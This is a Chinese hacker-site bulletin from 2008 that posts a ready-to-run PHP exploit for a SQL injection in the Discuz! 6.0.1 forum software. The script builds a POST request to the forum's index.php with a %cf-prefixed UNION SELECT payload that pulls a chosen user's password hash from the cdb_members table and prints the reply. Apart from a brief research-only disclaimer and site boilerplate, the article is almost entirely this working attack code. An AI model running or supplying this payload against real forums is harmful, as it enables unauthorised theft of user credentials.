Discuz! 6.0.1 又被SQL Injection啦-骇客基地-漏洞公告

Discuz! 6.0.1 又被SQL Injection啦

骇客基地阅读: 时间:2008-9-10 4:45:11 来源:www.hookbase.com

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
+---------------------------------------+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY  james
+------------------------------------------+
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host:      target server \n";
echo "port:      the web port, usually 80\n";
echo "path:      path to discuz\n";
echo "uid :      user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";

$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-length: ".strlen($content)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content."\r\n\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo 'No response from '.$host;
die;
}
fwrite($ock,$data);
while (!feof($ock)) {
   echo fgets($ock, 1024);
}
?>

* 【Discuz! 6.0.1 又被SQL Injection啦】文章由骇客基地网上搜集，其立场行为并不代表本站。
* 如果您发现该文章若无意中侵犯到您的权利,请联系我们！
* 未经本站明确许可，任何网站不得非法盗链及抄袭本站资源；如引用页面，请注明来自本站，谢谢您的支持！


	黑客首页　\|　服务指南　\|　软件发布　\|　关于我们　\|　本站声明　\|　隐私声明　\|　诚征英才　\|　网站地图　\|　友情链接　\|
	中国·黑客·骇客·基地　请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长：利客　Email:hookbase@163.com Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号